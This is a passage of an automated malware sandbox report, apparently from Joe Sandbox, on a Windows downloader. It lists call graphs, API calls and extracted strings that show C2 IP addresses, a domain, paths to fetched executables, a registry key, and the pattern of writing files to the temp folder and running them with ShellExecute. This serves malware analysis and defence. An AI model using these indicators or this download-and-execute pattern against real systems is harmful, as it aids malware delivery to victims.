426504 45026->45157 45028 425233 45220 42612f 45028->45220 45030 4253f6 45031 401b1e 27 API calls 45030->45031 45032 4255c2 45031->45032 45234 40356f 45032->45234 45034 4255df 45035 426504 63 API calls 45034->45035 45036 425666 45035->45036 45037 426504 63 API calls 45036->45037 45040 425840 ___scrt_fastfail 45037->45040 45038 425e40 45263 4019f8 26 API calls 45038->45263 45040->45038 45242 410c91 45040->45242 45045 42586d 45250 426217 CreateFileA 45045->45250 45049 401b1e 27 API calls 45050 4258a7 45049->45050 45253 426260 45050->45253 45053 4258ac 45054 426504 63 API calls 45053->45054 45055 425ac4 ___scrt_fastfail 45054->45055 45063 425bbf 45055->45063 45260 42631a GetTempPathA 45055->45260 45058 426217 3 API calls 45059 425ba3 45058->45059 45060 401b1e 27 API calls 45059->45060 45059->45063 45061 425bba 45060->45061 45062 426260 29 API calls 45061->45062 45062->45063 45064 426504 63 API calls 45063->45064 45066 425db5 ___scrt_fastfail 45064->45066 45068 410c91 51 API calls 45066->45068 45073 425e1b 45066->45073 45070 425ddf 45068->45070 45071 426217 3 API calls 45070->45071 45072 425dfd 45071->45072 45072->45073 45074 401b1e 27 API calls 45072->45074 45262 4019f8 26 API calls 45073->45262 45075 425e16 45074->45075 45076 426260 29 API calls 45075->45076 45076->45073 45714 4138ce 45077->45714 45080->44965 45081->44969 45082->44975 45086->44959 45088->44988 45089->44990 45090->44992 45091->44995 45093 409ba0 GetStartupInfoW 45092->45093 45093->44999 45095 41e1ca 45094->45095 45096 41e1d3 45094->45096 45099 41e0c0 51 API calls 5 library calls 45095->45099 45096->45003 45098->45003 45099->45096 45264 402c50 45100->45264 45104 4034c0 45103->45104 45105 4034d9 45103->45105 45104->45105 45273 40e509 46 API calls 45104->45273 45107 401b52 45105->45107 45274 402d13 45107->45274 45109 401b68 45109->45013 45111 42635e __EH_prolog 45110->45111 45305 403e0c 45111->45305 45113 426382 45113->45113 45114 402c71 27 API calls 45113->45114 45115 4263e7 45114->45115 45319 404097 
45115->45319 45117 426496 45121 4264b2 std::ios_base::_Ios_base_dtor 45117->45121 45336 40387f 26 API calls 2 library calls 45117->45336 45120 42646e 45124 402c50 27 API calls 45120->45124 45332 402bef 45121->45332 45122 402c71 27 API calls 45122->45120 45126 42648e 45124->45126 45127 402bef 26 API calls 45126->45127 45127->45117 45128 402bef 26 API calls 45129 424be8 45128->45129 45129->45017 45131 425eec __EH_prolog 45130->45131 45466 401bb2 45131->45466 45136 425f4b 45482 401a16 45136->45482 45137 425f2f 45503 401b6f 45137->45503 45140 425f58 45485 4024a1 45140->45485 45146 425fa6 45147 401b6f 68 API calls 45146->45147 45148 425f42 std::ios_base::_Ios_base_dtor 45147->45148 45148->45022 45150 4034ed __EH_prolog 45149->45150 45654 401056 45150->45654 45152 403513 45153 401056 50 API calls 45152->45153 45154 403542 45153->45154 45658 40399f 45154->45658 45156 403553 45156->45026 45158 42650e __EH_prolog 45157->45158 45159 401b1e 27 API calls 45158->45159 45160 4268d7 45159->45160 45696 401aa1 45160->45696 45162 4268ed 45163 401aa1 27 API calls 45162->45163 45164 426974 45163->45164 45165 401aa1 27 API calls 45164->45165 45166 426981 45165->45166 45167 401aa1 27 API calls 45166->45167 45168 4269e4 45167->45168 45169 401aa1 27 API calls 45168->45169 45170 4269f5 45169->45170 45171 401aa1 27 API calls 45170->45171 45172 426a02 45171->45172 45173 401aa1 27 API calls 45172->45173 45174 426aad 45173->45174 45175 401aa1 27 API calls 45174->45175 45176 426da4 45175->45176 45177 401aa1 27 API calls 45176->45177 45178 427053 45177->45178 45179 401aa1 27 API calls 45178->45179 45205 427060 45179->45205 45180 42717c 45181 401aa1 27 API calls 45180->45181 45182 427189 WSAStartup 45181->45182 45183 4271a3 socket 45182->45183 45206 4273da 45182->45206 45184 4271d0 45183->45184 45185 4271bb 45183->45185 45187 4271d8 gethostbyname 45184->45187 45186 4271c4 WSACleanup 45185->45186 45188 42758b 45186->45188 45189 4271e9 ctype 45187->45189 45187->45206 45188->45028 45191 4271fc htons 
connect 45189->45191 45190 42757e WSACleanup closesocket 45190->45188 45192 42722b 45191->45192 45191->45206 45193 42723d send 45192->45193 45194 42724d 45193->45194 45193->45206 45195 427253 send 45194->45195 45201 427269 ___scrt_fastfail 45194->45201 45195->45201 45195->45206 45196 42728f recv 45196->45201 45196->45206 45197 412faf 46 API calls 45197->45201 45198 4273cd 45199 4273d4 45198->45199 45200 427515 45198->45200 45218 4273e9 45198->45218 45199->45206 45199->45218 45202 427535 recv 45200->45202 45200->45206 45201->45196 45201->45197 45201->45198 45201->45206 45702 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45201->45702 45202->45200 45202->45206 45203 42740d recv 45203->45206 45203->45218 45205->45180 45207 401aa1 27 API calls 45205->45207 45206->45190 45209 42714c 45207->45209 45208 427508 45208->45206 45700 403ae1 27 API calls 45209->45700 45212 427157 45701 401ac2 27 API calls 45212->45701 45214 427164 45217 401aa1 27 API calls 45214->45217 45216 4274aa recv 45216->45206 45216->45218 45217->45180 45218->45203 45218->45206 45218->45208 45218->45216 45219 4274d5 recv 45218->45219 45703 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45218->45703 45704 42611d 22 API calls 45218->45704 45219->45206 45219->45218 45710 4275a4 45220->45710 45222 426139 RegCreateKeyExA 45223 4261f7 45222->45223 45224 42616c 45222->45224 45225 426206 45223->45225 45226 4261fd RegCloseKey 45223->45226 45227 402c71 27 API calls 45224->45227 45225->45030 45226->45225 45228 426195 45227->45228 45229 402c71 27 API calls 45228->45229 45230 4261be RegSetValueExA 45229->45230 45231 402bef 26 API calls 45230->45231 45232 4261ef 45231->45232 45233 402bef 26 API calls 45232->45233 45233->45223 45235 403579 __EH_prolog 45234->45235 45236 401056 50 API calls 45235->45236 45237 40359c 45236->45237 45238 401056 50 API calls 45237->45238 45239 4035c8 45238->45239 45240 40399f 27 API calls 45239->45240 45241 4035d9 45240->45241 45241->45034 45243 410cb2 45242->45243 45244 410c9d 
45242->45244 45713 41097b 51 API calls 5 library calls 45243->45713 45711 412381 20 API calls __dosmaperr 45244->45711 45247 410cad 45247->45045 45248 410ca2 45712 410905 26 API calls _Deallocate 45248->45712 45251 42588e 45250->45251 45252 42623e WriteFile FindCloseChangeNotification 45250->45252 45251->45049 45251->45053 45252->45251 45254 426271 45253->45254 45254->45254 45255 426279 ShellExecuteExA 45254->45255 45256 4262c5 45255->45256 45257 4262ae WaitForSingleObject CloseHandle 45255->45257 45258 402bef 26 API calls 45256->45258 45257->45256 45259 4262cd 45258->45259 45259->45053 45261 425b8e 45260->45261 45261->45058 45265 402c5a 45264->45265 45265->45265 45268 402c71 45265->45268 45267 401b3a 45267->45008 45269 402ca4 45268->45269 45271 402c80 BuildCatchObjectHelperInternal 45268->45271 45272 40373e 27 API calls 2 library calls 45269->45272 45271->45267 45272->45271 45273->45104 45275 402d2a 45274->45275 45277 402d31 ctype 45275->45277 45278 403859 45275->45278 45277->45109 45279 403866 45278->45279 45280 40386f 45278->45280 45285 4039ce 45279->45285 45282 40387b 45280->45282 45294 409256 45280->45294 45282->45277 45283 40386c 45283->45277 45286 409256 std::_Facet_Register 8 API calls 45285->45286 45287 4039e5 45286->45287 45288 4039f7 45287->45288 45289 4039ec 45287->45289 45301 41088a 26 API calls 3 library calls 45288->45301 45289->45283 45291 410924 45302 410932 11 API calls _abort 45291->45302 45293 410931 45296 40925b ___crtCompareStringA 45294->45296 45295 409275 45295->45283 45296->45295 45298 409277 std::_Facet_Register 45296->45298 45303 412ede 7 API calls 2 library calls 45296->45303 45304 40aa2b RaiseException 45298->45304 45300 40996c 45301->45291 45302->45293 45303->45296 45304->45300 45306 403e16 __EH_prolog 45305->45306 45337 407d73 45306->45337 45308 403e38 45347 404189 45308->45347 45314 403e7f 45385 4044e5 45314->45385 45316 403e8b 45406 4043fe 45316->45406 45320 4040a1 __EH_prolog 45319->45320 45325 4040b2 45320->45325 45459 40429b 27 
API calls __EH_prolog 45320->45459 45322 4040d9 45460 404777 27 API calls 45322->45460 45325->45117 45325->45120 45325->45122 45327 404144 45463 404777 27 API calls 45327->45463 45328 4040e9 45328->45327 45331 404152 45328->45331 45461 404777 27 API calls 45328->45461 45462 404579 26 API calls 45328->45462 45464 404238 26 API calls _Deallocate 45331->45464 45333 402c03 45332->45333 45334 402bfa 45332->45334 45333->45128 45465 40387f 26 API calls 2 library calls 45334->45465 45336->45121 45338 407d7f __EH_prolog3 45337->45338 45410 407b1c 45338->45410 45343 407d9d 45424 407f02 40 API calls _Atexit 45343->45424 45344 407dfb std::locale::_Init 45344->45308 45346 407da5 _Yarn 45416 407b74 45346->45416 45348 404193 __EH_prolog 45347->45348 45349 407b1c std::_Lockit::_Lockit 2 API calls 45348->45349 45350 4041a2 45349->45350 45429 401318 45350->45429 45352 4041b9 std::locale::_Getfacet 45360 4041cc 45352->45360 45435 40436e 76 API calls 3 library calls 45352->45435 45353 407b74 std::_Lockit::~_Lockit 2 API calls 45354 403e49 45353->45354 45363 4033ea 45354->45363 45356 4041dc 45357 4041e3 45356->45357 45358 404219 45356->45358 45436 407d41 8 API calls std::_Facet_Register 45357->45436 45437 40aa2b RaiseException 45358->45437 45360->45353 45362 40422f 45364 4033f4 __EH_prolog 45363->45364 45365 407b1c std::_Lockit::_Lockit 2 API calls 45364->45365 45366 403403 45365->45366 45367 401318 int 4 API calls 45366->45367 45369 40341a std::locale::_Getfacet 45367->45369 45368 40342d 45370 407b74 std::_Lockit::~_Lockit 2 API calls 45368->45370 45369->45368 45438 401429 76 API calls 2 library calls 45369->45438 45372 40346a 45370->45372 45379 404424 45372->45379 45373 40343d 45374 403444 45373->45374 45375 40347a 45373->45375 45439 407d41 8 API calls std::_Facet_Register 45374->45439 45440 40aa2b RaiseException 45375->45440 45378 403490 45380 40442e __EH_prolog 45379->45380 45441 404d6b 45380->45441 45382 404463 45383 409256 std::_Facet_Register 8 API calls 45382->45383 45384 
40447e 45383->45384 45384->45314 45386 4044ef __EH_prolog 45385->45386 45453 405177 8 API calls std::_Facet_Register 45386->45453 45388 40450d 45454 405025 29 API calls std::_Facet_Register 45388->45454 45390 404517 45391 404571 45390->45391 45392 40451e 45390->45392 45457 404efe 27 API calls 45391->45457 45455 405119 8 API calls std::_Facet_Register 45392->45455 45395 404528 45456 405e85 8 API calls std::_Facet_Register 45395->45456 45397 404531 45397->45316 45407 403eb8 45406->45407 45408 404406 45406->45408 45407->45113 45458 40387f 26 API calls 2 library calls 45408->45458 45411 407b32 45410->45411 45412 407b2b 45410->45412 45414 407b30 45411->45414 45426 408745 EnterCriticalSection 45411->45426 45425 411a65 EnterCriticalSection _abort 45412->45425 45414->45346 45423 407edf 8 API calls 2 library calls 45414->45423 45417 407b7e 45416->45417 45418 411a6e 45416->45418 45422 407b91 45417->45422 45427 408753 LeaveCriticalSection 45417->45427 45428 411a4e LeaveCriticalSection 45418->45428 45421 411a75 45421->45344 45422->45344 45423->45343 45424->45346 45425->45414 45426->45414 45427->45422 45428->45421 45430 401324 45429->45430 45431 401348 45429->45431 45432 407b1c std::_Lockit::_Lockit 2 API calls 45430->45432 45431->45352 45433 40132e 45432->45433 45434 407b74 std::_Lockit::~_Lockit 2 API calls 45433->45434 45434->45431 45435->45356 45436->45360 45437->45362 45438->45373 45439->45368 45440->45378 45444 404eb6 45441->45444 45443 404d85 45443->45382 45443->45443 45445 404ed2 45444->45445 45450 404ece 45444->45450 45446 404ef8 45445->45446 45447 404eda 45445->45447 45452 4030f6 27 API calls 45446->45452 45448 403859 27 API calls 45447->45448 45448->45450 45450->45443 45453->45388 45454->45390 45455->45395 45456->45397 45458->45407 45459->45322 45460->45328 45461->45328 45462->45328 45463->45331 45465->45333 45467 401bbc __EH_prolog 45466->45467 45507 40307c 45467->45507 45473 401c1f 45474 401c51 45473->45474 45525 40187f 43 API calls 2 library calls 45473->45525 
45476 402403 45474->45476 45477 40240d __EH_prolog 45476->45477 45543 402b06 45477->45543 45480 402441 45480->45136 45480->45137 45589 402baa 45482->45589 45484 401a30 ___scrt_fastfail 45484->45140 45486 4024ab __EH_prolog 45485->45486 45487 4024e4 45486->45487 45598 40187f 43 API calls 2 library calls 45486->45598 45489 402b06 43 API calls 45487->45489 45490 4024ee 45489->45490 45491 402551 45490->45491 45494 401d87 65 API calls 45490->45494 45495 40257c 45491->45495 45492 402511 45492->45491 45599 40187f 43 API calls 2 library calls 45492->45599 45494->45492 45496 402586 __EH_prolog 45495->45496 45497 402b06 43 API calls 45496->45497 45500 4025a8 45497->45500 45498 40265a 45506 402b87 26 API calls _Deallocate 45498->45506 45501 4025d8 45500->45501 45600 401f2b 45500->45600 45501->45498 45604 40187f 43 API calls 2 library calls 45501->45604 45642 4023b6 45503->45642 45505 401b95 45505->45148 45506->45146 45508 403086 __EH_prolog 45507->45508 45526 403175 45508->45526 45511 402fe5 45512 402fef __EH_prolog 45511->45512 45513 409256 std::_Facet_Register 8 API calls 45512->45513 45514 403005 45513->45514 45515 407d73 std::locale::_Init 43 API calls 45514->45515 45516 403013 45515->45516 45537 402e7b 45516->45537 45519 402f6b 45520 402f75 __EH_prolog 45519->45520 45521 402e7b 26 API calls 45520->45521 45524 402fbf std::ios_base::_Ios_base_dtor 45520->45524 45522 402f9d 45521->45522 45542 4035f5 76 API calls 7 library calls 45522->45542 45524->45473 45525->45474 45527 40317f __EH_prolog 45526->45527 45528 409256 std::_Facet_Register 8 API calls 45527->45528 45529 4031b9 45528->45529 45530 407d73 std::locale::_Init 43 API calls 45529->45530 45531 4031c6 45530->45531 45532 4033ea 76 API calls 45531->45532 45533 4031f5 std::ios_base::_Ios_base_dtor 45532->45533 45534 401bec 45533->45534 45536 40187f 43 API calls 2 library calls 45533->45536 45534->45511 45536->45534 45538 401c0f 45537->45538 45539 402ed9 45537->45539 45538->45519 45541 40e7d7 26 API calls 2 library calls 
45539->45541 45541->45538 45542->45524 45544 402b10 __EH_prolog 45543->45544 45555 403101 45544->45555 45547 401d87 45548 401d99 45547->45548 45554 401df4 45548->45554 45563 402dfd 45548->45563 45551 401de1 45551->45554 45572 40fd67 45551->45572 45554->45480 45556 40310b __EH_prolog 45555->45556 45557 403128 45556->45557 45561 403242 43 API calls __EH_prolog 45556->45561 45558 40241d 45557->45558 45562 40187f 43 API calls 2 library calls 45557->45562 45558->45480 45558->45547 45561->45557 45562->45558 45564 402e0d 45563->45564 45568 401dc4 45563->45568 45564->45568 45583 4022ae 65 API calls 45564->45583 45566 402e1a 45566->45568 45584 40ea7d 65 API calls 2 library calls 45566->45584 45568->45551 45568->45554 45569 4106d4 45568->45569 45570 41049b _Xfiopen 64 API calls 45569->45570 45571 4106ea 45570->45571 45571->45551 45573 40fd72 45572->45573 45575 40fd87 45572->45575 45585 412381 20 API calls __dosmaperr 45573->45585 45582 40fd9f 45575->45582 45587 412381 20 API calls __dosmaperr 45575->45587 45576 40fd77 45586 410905 26 API calls _Deallocate 45576->45586 45579 40fd94 45588 410905 26 API calls _Deallocate 45579->45588 45580 40fd82 45580->45554 45582->45554 45583->45566 45584->45568 45585->45576 45586->45580 45587->45579 45588->45582 45590 402bc6 45589->45590 45591 402bc2 45589->45591 45592 402be9 45590->45592 45593 402bce 45590->45593 45591->45484 45597 4030f6 27 API calls 45592->45597 45595 403859 27 API calls 45593->45595 45595->45591 45598->45487 45599->45491 45601 401f3f 45600->45601 45602 401f52 ctype 45600->45602 45601->45501 45602->45601 45605 4102e9 45602->45605 45604->45498 45608 410306 45605->45608 45607 410301 45607->45601 45609 410312 CallCatchBlock 45608->45609 45610 410352 45609->45610 45611 41034a std::_Locinfo::_Locinfo_dtor 45609->45611 45615 410325 ___scrt_fastfail 45609->45615 45621 40e81d EnterCriticalSection 45610->45621 45611->45607 45614 41035c 45622 41011d 45614->45622 45635 412381 20 API calls __dosmaperr 45615->45635 45616 41033f 45636 
410905 26 API calls _Deallocate 45616->45636 45621->45614 45625 41012f ___scrt_fastfail 45622->45625 45628 41014c 45622->45628 45623 41013c 45638 412381 20 API calls __dosmaperr 45623->45638 45625->45623 45625->45628 45630 41018f __fread_nolock 45625->45630 45626 410141 45639 410905 26 API calls _Deallocate 45626->45639 45637 410391 LeaveCriticalSection _Xfiopen 45628->45637 45629 4102ab ___scrt_fastfail 45641 412381 20 API calls __dosmaperr 45629->45641 45630->45628 45630->45629 45632 4154e8 _Xfiopen 26 API calls 45630->45632 45634 4192ad __fread_nolock 38 API calls 45630->45634 45640 410399 26 API calls 4 library calls 45630->45640 45632->45630 45634->45630 45635->45616 45636->45611 45637->45611 45638->45626 45639->45628 45640->45630 45641->45626 45643 4023dd 45642->45643 45644 4023ef 45643->45644 45646 402f2f 45643->45646 45644->45505 45647 402f39 45646->45647 45648 402f3d 45646->45648 45651 402e7b 26 API calls 45647->45651 45649 402dfd 65 API calls 45648->45649 45650 402f42 45649->45650 45652 40e228 _Xfiopen 67 API calls 45650->45652 45653 402f66 45651->45653 45652->45647 45653->45644 45655 40106d ___scrt_initialize_default_local_stdio_options 45654->45655 45662 40fd43 45655->45662 45659 4039c7 45658->45659 45660 4039bb 45658->45660 45659->45156 45661 402c71 27 API calls 45660->45661 45661->45659 45665 40ead5 45662->45665 45666 40eb15 45665->45666 45667 40eafd 45665->45667 45666->45667 45669 40eb1d 45666->45669 45689 412381 20 API calls __dosmaperr 45667->45689 45691 40e3f2 38 API calls 2 library calls 45669->45691 45670 40eb02 45690 410905 26 API calls _Deallocate 45670->45690 45673 40eb2d 45692 40eef9 20 API calls __Strcoll 45673->45692 45676 40eba5 45693 40f0ad 50 API calls 3 library calls 45676->45693 45677 40107b 45677->45152 45680 40eb0d 45682 4097a5 45680->45682 45681 40ebb0 45694 40ef2e 20 API calls _free 45681->45694 45683 4097b0 IsProcessorFeaturePresent 45682->45683 45684 4097ae 45682->45684 45686 409efa 45683->45686 45684->45677 45695 409ebe 
SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45686->45695 45688 409fdd 45688->45677 45689->45670 45690->45680 45691->45673 45692->45676 45693->45681 45694->45680 45695->45688 45697 401aab 45696->45697 45697->45697 45705 402cba 45697->45705 45699 401abd 45699->45162 45700->45212 45701->45214 45702->45201 45703->45218 45704->45218 45706 402cfa 45705->45706 45708 402cd0 BuildCatchObjectHelperInternal 45705->45708 45709 4037a9 27 API calls 2 library calls 45706->45709 45708->45699 45709->45708 45710->45222 45711->45248 45712->45247 45713->45247 45715 4138da _abort 45714->45715 45716 4138e1 45715->45716 45717 4138f3 45715->45717 45750 413a28 GetModuleHandleW 45716->45750 45738 411a06 EnterCriticalSection 45717->45738 45720 4138e6 45720->45717 45751 413a6c GetModuleHandleExW 45720->45751 45721 413998 45739 4139d8 45721->45739 45725 41396f 45727 413987 45725->45727 45760 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45725->45760 45761 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45727->45761 45728 4138fa 45728->45721 45728->45725 45759 4151ba 20 API calls _abort 45728->45759 45729 4139e1 45762 424699 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 45729->45762 45730 4139b5 45742 4139e7 45730->45742 45738->45728 45763 411a4e LeaveCriticalSection 45739->45763 45741 4139b1 45741->45729 45741->45730 45764 4177fa 45742->45764 45745 413a15 45748 413a6c _abort 8 API calls 45745->45748 45746 4139f5 GetPEB 45746->45745 45747 413a05 GetCurrentProcess TerminateProcess 45746->45747 45747->45745 45749 413a1d ExitProcess 45748->45749 45750->45720 45752 413a96 GetProcAddress 45751->45752 45753 413ab9 45751->45753 45754 413aab 45752->45754 45755 413ac8 45753->45755 45756 413abf FreeLibrary 45753->45756 45754->45753 45757 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 45755->45757 45756->45755 45758 4138f2 45757->45758 45758->45717 45759->45725 
45760->45727 45761->45721 45763->45741 45765 417815 45764->45765 45766 41781f 45764->45766 45768 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 45765->45768 45771 4171b7 5 API calls 2 library calls 45766->45771 45769 4139f1 45768->45769 45769->45745 45769->45746 45770 417836 45770->45765 45771->45770 45772 411c277 45773 411c27a 45772->45773 45776 411c536 45773->45776 45777 411c545 45776->45777 45780 411ccd6 45777->45780 45783 411ccf1 45780->45783 45781 411ccfa CreateToolhelp32Snapshot 45782 411cd16 Module32First 45781->45782 45781->45783 45784 411cd25 45782->45784 45785 411c535 45782->45785 45783->45781 45783->45782 45787 411c995 45784->45787 45788 411c9c0 45787->45788 45789 411c9d1 VirtualAlloc 45788->45789 45790 411ca09 45788->45790 45789->45790 45790->45790 45791 5bb003c 45792 5bb0049 45791->45792 45806 5bb0e0f SetErrorMode SetErrorMode 45792->45806 45797 5bb0265 45798 5bb02ce VirtualProtect 45797->45798 45800 5bb030b 45798->45800 45799 5bb0439 VirtualFree 45804 5bb04be 45799->45804 45805 5bb05f4 LoadLibraryA 45799->45805 45800->45799 45801 5bb04e3 LoadLibraryA 45801->45804 45803 5bb08c7 45804->45801 45804->45805 45805->45803 45807 5bb0223 45806->45807 45808 5bb0d90 45807->45808 45809 5bb0dad 45808->45809 45810 5bb0dbb GetPEB 45809->45810 45811 5bb0238 VirtualAlloc 45809->45811 45810->45811 45811->45797 45812 41aff9 45817 41adc7 45812->45817 45816 41b021 45818 41adf2 45817->45818 45828 41af3b 45818->45828 45832 422ce9 46 API calls 2 library calls 45818->45832 45820 41afe5 45836 410905 26 API calls _Deallocate 45820->45836 45822 41af44 45822->45816 45829 41a34b 45822->45829 45824 41af85 45824->45828 45833 422ce9 46 API calls 2 library calls 45824->45833 45826 41afa4 45826->45828 45834 422ce9 46 API calls 2 library calls 45826->45834 45828->45822 45835 412381 20 API calls __dosmaperr 45828->45835 45837 419d20 45829->45837 45831 41a366 45831->45816 45832->45824 45833->45826 45834->45828 45835->45820 45836->45822 45839 419d2c 

Control-flow Graph: entry block 0 at 424b3e-424eb5
APIs
• Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
• Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
• Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
• String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
• API String ID: 2531350358-4166474000
• Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
• Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
• Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1697 4139e7-4139f3 call 4177fa 1700 413a15-413a21 call 413a6c ExitProcess 1697->1700 1701 4139f5-413a03 GetPEB 1697->1701 1701->1700 1702 413a05-413a0f GetCurrentProcess TerminateProcess 1701->1702 1702->1700
APIs
• GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
• TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
• ExitProcess.KERNEL32 ref: 00413A21
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
• Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: entry block 750 at 426504-427062
APIs
• __EH_prolog.LIBCMT ref: 00426509
• WSAStartup.WS2_32(00000202,?), ref: 00427195
• socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
• WSACleanup.WS2_32 ref: 004271C5
• gethostbyname.WS2_32(00000000), ref: 004271D9
• htons.WS2_32(?), ref: 0042720B
• connect.WS2_32(00000000,?,00000010), ref: 0042721C
• send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
• send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
• recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
• recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
• recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
• recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
• recv.WS2_32(00000000,?,?,00000000), ref: 00427540
• WSACleanup.WS2_32 ref: 0042757E
• closesocket.WS2_32(?), ref: 00427585
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
• String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
• API String ID: 791229064-3676584321
• Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
• Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
• GetLastError.KERNEL32 ref: 0041A47F
• __dosmaperr.LIBCMT ref: 0041A486
• GetFileType.KERNEL32(00000000), ref: 0041A492
• GetLastError.KERNEL32 ref: 0041A49C
• __dosmaperr.LIBCMT ref: 0041A4A5
• CloseHandle.KERNEL32(00000000), ref: 0041A4C5
• CloseHandle.KERNEL32(?), ref: 0041A60F
• GetLastError.KERNEL32 ref: 0041A641
• __dosmaperr.LIBCMT ref: 0041A648
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
• Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
• Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
• Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
